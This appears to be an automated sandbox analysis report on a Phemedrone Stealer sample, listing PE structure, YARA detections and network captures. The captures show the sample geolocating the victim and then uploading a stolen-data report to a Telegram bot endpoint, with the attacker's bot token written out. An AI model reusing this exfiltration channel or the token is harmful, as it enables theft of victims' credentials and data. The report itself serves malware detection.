                                                                                          Icon Hash:00928e8e8686b000
                                                                                          Entrypoint:0x4a4d25
                                                                                          Entrypoint Section:.hJL
                                                                                          Digitally signed:false
                                                                                          Imagebase:0x400000
                                                                                          Subsystem:windows gui
                                                                                          Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                          Time Stamp:0x67436C51 [Sun Nov 24 18:11:29 2024 UTC]
                                                                                          TLS Callbacks:
                                                                                          CLR (.Net) Version:
                                                                                          OS Version Major:4
                                                                                          OS Version Minor:0
                                                                                          File Version Major:4
                                                                                          File Version Minor:0
                                                                                          Subsystem Version Major:4
                                                                                          Subsystem Version Minor:0
                                                                                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                          Instruction
                                                                                          jmp dword ptr [00468000h]
                                                                                          adc al, 51h
                                                                                          jne 00007FABC0BE5C5Ah
                                                                                          mov ah, 86h
                                                                                          aaa
                                                                                          or eax, 09A63753h
                                                                                          dec esp
                                                                                          insd
                                                                                          pop ebx
                                                                                          in eax, 20h
                                                                                          jns 00007FABC0BE5BE3h
                                                                                          mov bl, A8h
                                                                                          pop ss
                                                                                          inc ecx
                                                                                          push ebp
                                                                                          aaa
                                                                                          ror esp, cl
                                                                                          test edi, eax
                                                                                          adc byte ptr [edx], al
                                                                                          insd
                                                                                          pop eax
                                                                                          loope 00007FABC0BE5BDBh
                                                                                          out dx, eax
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xa5bbc | 0x28 | .hJL
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x10a000 | 0x5c6 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x10c000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x68000 | 0x8 | .W!:
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0xdf000 | 0x48 | .hJL
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                          .text0x20000x21f240x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                          .:"%0x240000x4240f0x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                          .W!:0x680000x80x200e413766a3d8970529a55fa86ad690aa4False0.03125data0.06116285224115448IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                          .hJL0x6a0000x9e9780x9ea000526f7cb913ae31383ddc537bef7ac13False0.7993421862687156data7.536963336777202IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                          .rsrc0x10a0000x5c60x600e1ced04f161248f762306e58aa39e121False0.4244791666666667data4.121957477822542IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                          .reloc0x10c0000xc0x2006fcd3334dc548100f0c11b6e0e53b2e3False0.048828125data0.12227588125913882IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                          RT_VERSION0x10a0a00x33cdata0.4251207729468599
                                                                                          RT_MANIFEST0x10a3dc0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347
                                                                                          DLLImport
                                                                                          mscoree.dll_CorExeMain
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 17, 2024 09:45:02.622343063 CET | 49701 | 443 | 192.168.2.7 | 104.26.0.100
Dec 17, 2024 09:45:02.622440100 CET | 443 | 49701 | 104.26.0.100 | 192.168.2.7
Dec 17, 2024 09:45:02.622528076 CET | 49701 | 443 | 192.168.2.7 | 104.26.0.100
Dec 17, 2024 09:45:02.639652014 CET | 49701 | 443 | 192.168.2.7 | 104.26.0.100
Dec 17, 2024 09:45:02.639689922 CET | 443 | 49701 | 104.26.0.100 | 192.168.2.7
Dec 17, 2024 09:45:03.858319998 CET | 443 | 49701 | 104.26.0.100 | 192.168.2.7
Dec 17, 2024 09:45:03.858642101 CET | 49701 | 443 | 192.168.2.7 | 104.26.0.100
Dec 17, 2024 09:45:03.864100933 CET | 49701 | 443 | 192.168.2.7 | 104.26.0.100
Dec 17, 2024 09:45:03.864146948 CET | 443 | 49701 | 104.26.0.100 | 192.168.2.7
Dec 17, 2024 09:45:03.864476919 CET | 443 | 49701 | 104.26.0.100 | 192.168.2.7
Dec 17, 2024 09:45:03.917692900 CET | 49701 | 443 | 192.168.2.7 | 104.26.0.100
Dec 17, 2024 09:45:03.980510950 CET | 49701 | 443 | 192.168.2.7 | 104.26.0.100
Dec 17, 2024 09:45:04.027323008 CET | 443 | 49701 | 104.26.0.100 | 192.168.2.7
Dec 17, 2024 09:45:04.310477018 CET | 443 | 49701 | 104.26.0.100 | 192.168.2.7
Dec 17, 2024 09:45:04.310703039 CET | 443 | 49701 | 104.26.0.100 | 192.168.2.7
Dec 17, 2024 09:45:04.310760021 CET | 49701 | 443 | 192.168.2.7 | 104.26.0.100
Dec 17, 2024 09:45:04.318938971 CET | 49701 | 443 | 192.168.2.7 | 104.26.0.100
Dec 17, 2024 09:45:10.626285076 CET | 49708 | 443 | 192.168.2.7 | 149.154.167.220
Dec 17, 2024 09:45:10.626333952 CET | 443 | 49708 | 149.154.167.220 | 192.168.2.7
Dec 17, 2024 09:45:10.626451969 CET | 49708 | 443 | 192.168.2.7 | 149.154.167.220
Dec 17, 2024 09:45:10.627171993 CET | 49708 | 443 | 192.168.2.7 | 149.154.167.220
Dec 17, 2024 09:45:10.627186060 CET | 443 | 49708 | 149.154.167.220 | 192.168.2.7
Dec 17, 2024 09:45:12.062150955 CET | 443 | 49708 | 149.154.167.220 | 192.168.2.7
Dec 17, 2024 09:45:12.062249899 CET | 49708 | 443 | 192.168.2.7 | 149.154.167.220
Dec 17, 2024 09:45:12.065061092 CET | 49708 | 443 | 192.168.2.7 | 149.154.167.220
Dec 17, 2024 09:45:12.065071106 CET | 443 | 49708 | 149.154.167.220 | 192.168.2.7
Dec 17, 2024 09:45:12.065526962 CET | 443 | 49708 | 149.154.167.220 | 192.168.2.7
Dec 17, 2024 09:45:12.066780090 CET | 49708 | 443 | 192.168.2.7 | 149.154.167.220
Dec 17, 2024 09:45:12.107353926 CET | 443 | 49708 | 149.154.167.220 | 192.168.2.7
Dec 17, 2024 09:45:12.434406996 CET | 49708 | 443 | 192.168.2.7 | 149.154.167.220
Dec 17, 2024 09:45:12.434439898 CET | 443 | 49708 | 149.154.167.220 | 192.168.2.7
Dec 17, 2024 09:45:12.438142061 CET | 49708 | 443 | 192.168.2.7 | 149.154.167.220
Dec 17, 2024 09:45:12.438163996 CET | 443 | 49708 | 149.154.167.220 | 192.168.2.7
Dec 17, 2024 09:45:12.438322067 CET | 49708 | 443 | 192.168.2.7 | 149.154.167.220
Dec 17, 2024 09:45:12.438623905 CET | 443 | 49708 | 149.154.167.220 | 192.168.2.7
Dec 17, 2024 09:45:12.442152023 CET | 49708 | 443 | 192.168.2.7 | 149.154.167.220
Dec 17, 2024 09:45:12.442172050 CET | 443 | 49708 | 149.154.167.220 | 192.168.2.7
Dec 17, 2024 09:45:12.445123911 CET | 49708 | 443 | 192.168.2.7 | 149.154.167.220
Dec 17, 2024 09:45:12.445135117 CET | 443 | 49708 | 149.154.167.220 | 192.168.2.7
Dec 17, 2024 09:45:12.445151091 CET | 49708 | 443 | 192.168.2.7 | 149.154.167.220
Dec 17, 2024 09:45:12.445156097 CET | 443 | 49708 | 149.154.167.220 | 192.168.2.7
Dec 17, 2024 09:45:12.445264101 CET | 49708 | 443 | 192.168.2.7 | 149.154.167.220
Dec 17, 2024 09:45:12.445271969 CET | 443 | 49708 | 149.154.167.220 | 192.168.2.7
Dec 17, 2024 09:45:12.445291042 CET | 49708 | 443 | 192.168.2.7 | 149.154.167.220
Dec 17, 2024 09:45:12.445332050 CET | 443 | 49708 | 149.154.167.220 | 192.168.2.7
Dec 17, 2024 09:45:12.445408106 CET | 49708 | 443 | 192.168.2.7 | 149.154.167.220
Dec 17, 2024 09:45:12.445416927 CET | 443 | 49708 | 149.154.167.220 | 192.168.2.7
Dec 17, 2024 09:45:12.445425987 CET | 49708 | 443 | 192.168.2.7 | 149.154.167.220
Dec 17, 2024 09:45:12.445434093 CET | 443 | 49708 | 149.154.167.220 | 192.168.2.7
Dec 17, 2024 09:45:12.445441961 CET | 49708 | 443 | 192.168.2.7 | 149.154.167.220
Dec 17, 2024 09:45:12.445447922 CET | 443 | 49708 | 149.154.167.220 | 192.168.2.7
Dec 17, 2024 09:45:12.445488930 CET | 49708 | 443 | 192.168.2.7 | 149.154.167.220
Dec 17, 2024 09:45:12.445501089 CET | 443 | 49708 | 149.154.167.220 | 192.168.2.7
Dec 17, 2024 09:45:12.445543051 CET | 49708 | 443 | 192.168.2.7 | 149.154.167.220
Dec 17, 2024 09:45:12.445554018 CET | 443 | 49708 | 149.154.167.220 | 192.168.2.7
Dec 17, 2024 09:45:12.445566893 CET | 49708 | 443 | 192.168.2.7 | 149.154.167.220
Dec 17, 2024 09:45:12.445585966 CET | 443 | 49708 | 149.154.167.220 | 192.168.2.7
Dec 17, 2024 09:45:12.445589066 CET | 49708 | 443 | 192.168.2.7 | 149.154.167.220
Dec 17, 2024 09:45:12.445678949 CET | 49708 | 443 | 192.168.2.7 | 149.154.167.220
Dec 17, 2024 09:45:12.445697069 CET | 443 | 49708 | 149.154.167.220 | 192.168.2.7
Dec 17, 2024 09:45:12.445712090 CET | 49708 | 443 | 192.168.2.7 | 149.154.167.220
Dec 17, 2024 09:45:12.445724964 CET | 443 | 49708 | 149.154.167.220 | 192.168.2.7
Dec 17, 2024 09:45:12.445735931 CET | 49708 | 443 | 192.168.2.7 | 149.154.167.220
Dec 17, 2024 09:45:12.445741892 CET | 443 | 49708 | 149.154.167.220 | 192.168.2.7
Dec 17, 2024 09:45:12.445761919 CET | 49708 | 443 | 192.168.2.7 | 149.154.167.220
Dec 17, 2024 09:45:12.445771933 CET | 443 | 49708 | 149.154.167.220 | 192.168.2.7
Dec 17, 2024 09:45:12.445830107 CET | 49708 | 443 | 192.168.2.7 | 149.154.167.220
Dec 17, 2024 09:45:12.445837975 CET | 443 | 49708 | 149.154.167.220 | 192.168.2.7
Dec 17, 2024 09:45:12.445858002 CET | 49708 | 443 | 192.168.2.7 | 149.154.167.220
Dec 17, 2024 09:45:12.445869923 CET | 443 | 49708 | 149.154.167.220 | 192.168.2.7
Dec 17, 2024 09:45:12.445874929 CET | 49708 | 443 | 192.168.2.7 | 149.154.167.220
Dec 17, 2024 09:45:12.445972919 CET | 49708 | 443 | 192.168.2.7 | 149.154.167.220
Dec 17, 2024 09:45:12.445981026 CET | 443 | 49708 | 149.154.167.220 | 192.168.2.7
Dec 17, 2024 09:45:12.445991993 CET | 49708 | 443 | 192.168.2.7 | 149.154.167.220
Dec 17, 2024 09:45:12.445997000 CET | 443 | 49708 | 149.154.167.220 | 192.168.2.7
Dec 17, 2024 09:45:12.446052074 CET | 49708 | 443 | 192.168.2.7 | 149.154.167.220
Dec 17, 2024 09:45:12.446064949 CET | 443 | 49708 | 149.154.167.220 | 192.168.2.7
Dec 17, 2024 09:45:12.446108103 CET | 49708 | 443 | 192.168.2.7 | 149.154.167.220
Dec 17, 2024 09:45:12.446115017 CET | 443 | 49708 | 149.154.167.220 | 192.168.2.7
Dec 17, 2024 09:45:12.446141005 CET | 49708 | 443 | 192.168.2.7 | 149.154.167.220
Dec 17, 2024 09:45:12.446146965 CET | 443 | 49708 | 149.154.167.220 | 192.168.2.7
Dec 17, 2024 09:45:12.446151972 CET | 49708 | 443 | 192.168.2.7 | 149.154.167.220
Dec 17, 2024 09:45:12.446255922 CET | 49708 | 443 | 192.168.2.7 | 149.154.167.220
Dec 17, 2024 09:45:12.446263075 CET | 443 | 49708 | 149.154.167.220 | 192.168.2.7
Dec 17, 2024 09:45:12.446278095 CET | 49708 | 443 | 192.168.2.7 | 149.154.167.220
Dec 17, 2024 09:45:12.446285963 CET | 443 | 49708 | 149.154.167.220 | 192.168.2.7
Dec 17, 2024 09:45:12.446341991 CET | 49708 | 443 | 192.168.2.7 | 149.154.167.220
Dec 17, 2024 09:45:12.446348906 CET | 443 | 49708 | 149.154.167.220 | 192.168.2.7
Dec 17, 2024 09:45:12.446367025 CET | 49708 | 443 | 192.168.2.7 | 149.154.167.220
Dec 17, 2024 09:45:12.446372986 CET | 443 | 49708 | 149.154.167.220 | 192.168.2.7
Dec 17, 2024 09:45:12.446387053 CET | 49708 | 443 | 192.168.2.7 | 149.154.167.220
Dec 17, 2024 09:45:12.446398020 CET | 443 | 49708 | 149.154.167.220 | 192.168.2.7
Dec 17, 2024 09:45:12.456805944 CET | 49708 | 443 | 192.168.2.7 | 149.154.167.220
Dec 17, 2024 09:45:12.456880093 CET | 49708 | 443 | 192.168.2.7 | 149.154.167.220
Dec 17, 2024 09:45:12.456892967 CET | 443 | 49708 | 149.154.167.220 | 192.168.2.7
Dec 17, 2024 09:45:12.456969976 CET | 49708 | 443 | 192.168.2.7 | 149.154.167.220
Dec 17, 2024 09:45:12.456979990 CET | 443 | 49708 | 149.154.167.220 | 192.168.2.7
Dec 17, 2024 09:45:12.456988096 CET | 49708 | 443 | 192.168.2.7 | 149.154.167.220
Dec 17, 2024 09:45:12.456993103 CET | 443 | 49708 | 149.154.167.220 | 192.168.2.7
Dec 17, 2024 09:45:12.457005978 CET | 49708 | 443 | 192.168.2.7 | 149.154.167.220
Dec 17, 2024 09:45:12.457011938 CET | 443 | 49708 | 149.154.167.220 | 192.168.2.7
Dec 17, 2024 09:45:12.457051039 CET | 49708 | 443 | 192.168.2.7 | 149.154.167.220
Dec 17, 2024 09:45:12.457057953 CET | 443 | 49708 | 149.154.167.220 | 192.168.2.7
Dec 17, 2024 09:45:12.457106113 CET | 49708 | 443 | 192.168.2.7 | 149.154.167.220
Dec 17, 2024 09:45:12.457113028 CET | 443 | 49708 | 149.154.167.220 | 192.168.2.7
Dec 17, 2024 09:45:12.457148075 CET | 49708 | 443 | 192.168.2.7 | 149.154.167.220
Dec 17, 2024 09:45:12.457184076 CET | 49708 | 443 | 192.168.2.7 | 149.154.167.220
Dec 17, 2024 09:45:12.457190037 CET | 443 | 49708 | 149.154.167.220 | 192.168.2.7
Dec 17, 2024 09:45:12.457228899 CET | 49708 | 443 | 192.168.2.7 | 149.154.167.220
Dec 17, 2024 09:45:12.457235098 CET | 443 | 49708 | 149.154.167.220 | 192.168.2.7
Dec 17, 2024 09:45:12.457282066 CET | 49708 | 443 | 192.168.2.7 | 149.154.167.220
Dec 17, 2024 09:45:12.457289934 CET | 443 | 49708 | 149.154.167.220 | 192.168.2.7
Dec 17, 2024 09:45:12.457295895 CET | 49708 | 443 | 192.168.2.7 | 149.154.167.220
Dec 17, 2024 09:45:12.457299948 CET | 443 | 49708 | 149.154.167.220 | 192.168.2.7
Dec 17, 2024 09:45:12.457319021 CET | 49708 | 443 | 192.168.2.7 | 149.154.167.220
Dec 17, 2024 09:45:12.457324028 CET | 443 | 49708 | 149.154.167.220 | 192.168.2.7
Dec 17, 2024 09:45:12.457331896 CET | 49708 | 443 | 192.168.2.7 | 149.154.167.220
Dec 17, 2024 09:45:12.457346916 CET | 49708 | 443 | 192.168.2.7 | 149.154.167.220
Dec 17, 2024 09:45:12.457436085 CET | 49708 | 443 | 192.168.2.7 | 149.154.167.220
Dec 17, 2024 09:45:12.457463026 CET | 49708 | 443 | 192.168.2.7 | 149.154.167.220
Dec 17, 2024 09:45:12.457499027 CET | 49708 | 443 | 192.168.2.7 | 149.154.167.220
Dec 17, 2024 09:45:12.457540989 CET | 49708 | 443 | 192.168.2.7 | 149.154.167.220
Dec 17, 2024 09:45:12.457550049 CET | 49708 | 443 | 192.168.2.7 | 149.154.167.220
Dec 17, 2024 09:45:12.457571983 CET | 49708 | 443 | 192.168.2.7 | 149.154.167.220
Dec 17, 2024 09:45:12.499341011 CET | 443 | 49708 | 149.154.167.220 | 192.168.2.7
Dec 17, 2024 09:45:12.669181108 CET | 443 | 49708 | 149.154.167.220 | 192.168.2.7
Dec 17, 2024 09:45:12.714729071 CET | 49708 | 443 | 192.168.2.7 | 149.154.167.220
Dec 17, 2024 09:45:14.225159883 CET | 443 | 49708 | 149.154.167.220 | 192.168.2.7
Dec 17, 2024 09:45:14.227180004 CET | 443 | 49708 | 149.154.167.220 | 192.168.2.7
Dec 17, 2024 09:45:14.227344990 CET | 49708 | 443 | 192.168.2.7 | 149.154.167.220
Dec 17, 2024 09:45:14.234355927 CET | 49708 | 443 | 192.168.2.7 | 149.154.167.220

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 17, 2024 09:45:02.472817898 CET | 54751 | 53 | 192.168.2.7 | 1.1.1.1
Dec 17, 2024 09:45:02.612515926 CET | 53 | 54751 | 1.1.1.1 | 192.168.2.7
Dec 17, 2024 09:45:10.487593889 CET | 54922 | 53 | 192.168.2.7 | 1.1.1.1
Dec 17, 2024 09:45:10.625349045 CET | 53 | 54922 | 1.1.1.1 | 192.168.2.7

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 17, 2024 09:45:02.472817898 CET | 192.168.2.7 | 1.1.1.1 | 0xbba8 | Standard query (0) | get.geojs.io | A (IP address) | IN (0x0001) | false
Dec 17, 2024 09:45:10.487593889 CET | 192.168.2.7 | 1.1.1.1 | 0xdbfe | Standard query (0) | api.telegram.org | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 17, 2024 09:45:02.612515926 CET | 1.1.1.1 | 192.168.2.7 | 0xbba8 | No error (0) | get.geojs.io | - | 104.26.0.100 | A (IP address) | IN (0x0001) | false
Dec 17, 2024 09:45:02.612515926 CET | 1.1.1.1 | 192.168.2.7 | 0xbba8 | No error (0) | get.geojs.io | - | 172.67.70.233 | A (IP address) | IN (0x0001) | false
Dec 17, 2024 09:45:02.612515926 CET | 1.1.1.1 | 192.168.2.7 | 0xbba8 | No error (0) | get.geojs.io | - | 104.26.1.100 | A (IP address) | IN (0x0001) | false
Dec 17, 2024 09:45:10.625349045 CET | 1.1.1.1 | 192.168.2.7 | 0xdbfe | No error (0) | api.telegram.org | - | 149.154.167.220 | A (IP address) | IN (0x0001) | false
                                                                                          • get.geojs.io
                                                                                          • api.telegram.org
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.7 | 49701 | 104.26.0.100 | 443 | 5200 | C:\Users\user\Desktop\Ls4O6Pmixd.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-17 08:45:03 UTC | 76 | OUT | GET /v1/ip/geo.json HTTP/1.1
Host: get.geojs.io
Connection: Keep-Alive
2024-12-17 08:45:04 UTC | 1124 | IN | HTTP/1.1 200 OK
Date: Tue, 17 Dec 2024 08:45:04 GMT
Content-Type: application/json
Transfer-Encoding: chunked
Connection: close
x-request-id: 0bb1ce4b38437b8b490938ce0efeb21f-ASH
strict-transport-security: max-age=15552000; includeSubDomains; preload
access-control-allow-origin: *
access-control-allow-methods: GET
pragma: no-cache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
geojs-backend: ash-01
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MaFIgdN%2B%2Bzd6DqHz8FetNAc2rUcPxkeNig200aRYRGf1wEvjYBd%2FhVMYLZuUmnJdT1yuzCGmXj1Oel2xVehFnzKVmuR3frMCqaOVhnXLAF%2F2hSvne2ldH7k9auLiPg%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
X-Content-Type-Options: nosniff
Server: cloudflare
CF-RAY: 8f35a284eb6142bc-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1640&min_rtt=1605&rtt_var=627&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2817&recv_bytes=690&delivery_rate=1819314&cwnd=225&unsent_bytes=0&cid=da96e56bde2584ec&ts=464&x=0"
2024-12-17 08:45:04 UTC | 245 | IN | Data Raw: 31 34 36 0d 0a 7b 22 6c 6f 6e 67 69 74 75 64 65 22 3a 22 2d 37 34 2e 30 30 31 34 22 2c 22 61 63 63 75 72 61 63 79 22 3a 32 30 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 5c 2f 4e 65 77 5f 59 6f 72 6b 22 2c 22 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 22 3a 22 41 53 33 33 35 36 20 4c 45 56 45 4c 33 22 2c 22 61 73 6e 22 3a 33 33 35 36 2c 22 69 70 22 3a 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 22 61 72 65 61 5f 63 6f 64 65 22 3a 22 30 22 2c 22 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 5f 6e 61 6d 65 22 3a 22 4c 45 56 45 4c 33 22 2c 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 55 53 22 2c 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 33 22 3a 22 55 53 41 22 2c 22 63 6f 6e
Data Ascii: 146{"longitude":"-74.0014","accuracy":20,"timezone":"America\/New_York","city":"New York","organization":"AS3356 LEVEL3","asn":3356,"ip":"8.46.123.189","area_code":"0","organization_name":"LEVEL3","country_code":"US","country_code3":"USA","con
2024-12-17 08:45:04 UTC | 88 | IN | Data Raw: 74 69 6e 65 6e 74 5f 63 6f 64 65 22 3a 22 4e 41 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 6c 61 74 69 74 75 64 65 22 3a 22 34 30 2e 37 35 30 33 22 7d 0a 0d 0a
Data Ascii: tinent_code":"NA","country":"United States","region":"New York","latitude":"40.7503"}
2024-12-17 08:45:04 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
1           192.168.2.7  49708        149.154.167.220  443               5200  C:\Users\user\Desktop\Ls4O6Pmixd.exe
Timestamp                Bytes transferred  Direction  Data
2024-12-17 08:45:12 UTC  384                OUT        POST /bot7604180600:AAHwr2u1ZveiHzQQ_yVoPYP2QNFw1punco0/sendDocument HTTP/1.1
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/602.37 (KHTML, like Gecko) Chrome/49.0.1422.399 Safari/600
                                                                                          Content-Type: multipart/form-data; boundary=----------------------------8dd1e4d34176457
                                                                                          Host: api.telegram.org
                                                                                          Content-Length: 733555
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          2024-12-17 08:45:12 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 31 65 34 64 33 34 31 37 36 34 35 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 5b 55 53 5d 38 2e 34 36 2e 31 32 33 2e 31 38 39 2d 50 68 65 6d 65 64 72 6f 6e 65 2d 52 65 70 6f 72 74 2e 70 68 65 6d 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 92 a2 c1 63 de c9 95 bc 4c a4 7a bb bf dd bf f4 07 fe 44 60 75 83 29 aa f9 d0 09 6b 36 44 21 1e 0d 60 13 c3 85 b3 5c 67 6c 0b 02 45 e3 1e c5 e3 64 1e 0b f5 bd e9 28 33 8d c2 02 af 92 ae f2 2a 80
                                                                                          Data Ascii: ------------------------------8dd1e4d34176457Content-Disposition: form-data; name="document"; filename="[US]8.46.123.189-Phemedrone-Report.phem"Content-Type: application/octet-streamcLzD`u)k6D!`\glEd(3*
2024-12-17 08:45:12 UTC  25                 IN         HTTP/1.1 100 Continue
2024-12-17 08:45:14 UTC  1250               IN         HTTP/1.1 200 OK
                                                                                          Server: nginx/1.18.0
                                                                                          Date: Tue, 17 Dec 2024 08:45:14 GMT
                                                                                          Content-Type: application/json
                                                                                          Content-Length: 862
                                                                                          Connection: close
                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                          Access-Control-Allow-Origin: *
                                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                          {"ok":true,"result":{"message_id":6201,"sender_chat":{"id":-1002313196419,"title":"fdsfgwqergwerghrew","type":"channel"},"chat":{"id":-1002313196419,"title":"fdsfgwqergwerghrew","type":"channel"},"date":1734425113,"document":{"file_name":"[US]8.46.123.189-Phemedrone-Report.phem","file_id":"BQACAgIAAyEGAASJ4JODAAIYOWdhOhldu7q_oZFGEdjbivgdQYi1AAK5YgACHE0JS3BrCfjaH9_9NgQ","file_unique_id":"AgADuWIAAhxNCUs","file_size":732784},"caption":"Phemedrone Stealer Report | by @webster480 & @TheDyer\n\n - IP: 8.46.123.189 (United States)\n - Tag: Default (Tivotop)\n - Passwords: 0\n - Cookies: 2\n - Wallets: 0\n\n\n\n\n@freakcodingspot","caption_entities":[{"offset":0,"length":25,"type":"bold"},{"offset":31,"length":11,"type":"mention"},{"offset":45,"length":8,"type":"mention"},{"offset":55,"length":106,"type":"pre"},{"offset":165,"length":16,"type":"mention"}]}}



Target ID: 4
Start time: 03:44:57
Start date: 17/12/2024
Path: C:\Users\user\Desktop\Ls4O6Pmixd.exe
Wow64 process (32bit): false
Commandline: "C:\Users\user\Desktop\Ls4O6Pmixd.exe"
Imagebase: 0x50000
File size: 653'312 bytes
MD5 hash: 16E8183843E73D742EE2F2D334B8C6C0
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
                                                                                          Yara matches:
                                                                                          • Rule: JoeSecurity_PhemedroneStealer, Description: Yara detected Phemedrone Stealer, Source: 00000004.00000002.1424388835.00000000028C2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_PhemedroneStealer, Description: Yara detected Phemedrone Stealer, Source: 00000004.00000002.1424388835.0000000002790000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_PhemedroneStealer, Description: Yara detected Phemedrone Stealer, Source: 00000004.00000002.1424388835.00000000028BE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_PhemedroneStealer, Description: Yara detected Phemedrone Stealer, Source: 00000004.00000002.1424388835.0000000002588000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_GenericStealer_9, Description: Yara detected Generic Stealer, Source: 00000004.00000002.1424388835.0000000002588000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_PhemedroneStealer, Description: Yara detected Phemedrone Stealer, Source: 00000004.00000002.1426211711.00000000127C7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_PhemedroneStealer, Description: Yara detected Phemedrone Stealer, Source: 00000004.00000002.1424388835.00000000025A1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_PhemedroneStealer, Description: Yara detected Phemedrone Stealer, Source: 00000004.00000002.1424388835.00000000027B8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation: low
Has exited: true


                                                                                            Execution Graph

Execution Coverage: 10.9%
Dynamic/Decrypted Code Coverage: 100%
Signature Coverage: 32%
Total number of Nodes: 100
